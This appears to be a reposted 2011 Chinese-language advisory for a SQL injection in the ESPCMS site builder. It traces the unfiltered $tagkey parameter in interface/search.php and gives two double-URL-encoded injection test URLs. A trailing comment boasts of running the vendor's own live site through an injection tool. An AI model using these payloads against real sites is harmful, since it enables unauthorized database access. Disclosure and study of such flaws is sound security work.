//-------------------------------------
Name: EspCms
Site: http://www.ecisp.cn/html/cn/
Desc: 在urldecode() 的作用下的,无过滤导致注入形成
Author: tojen(tojen.me at gmail.com)
Date:2011/3/7
//-------------------------------------
描述:
interface/search.php ----> in_taglist() ----> $tagkey( Urldecdoe 处理后 直接带入SQL语句,注入形成)
测试:
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=1%23
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2527,%2527dd%2527)%20and%201=2%23
说明:
由于带有注入语句的SQL在同一函数中执行了俩次,而字段数目不一样,故union查询受阻
文章来源于lcx.cc:【0day】ESPCMS 易思企业建站系统注入
By:末日 很无聊的东西,就是人家客服太牛了根本不搭理我,说拿到了也没事。 http://www.phpweb.net/down/class/index.php?myord=1 直接放到工具里就能跑了。 直接干官网: Datab…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论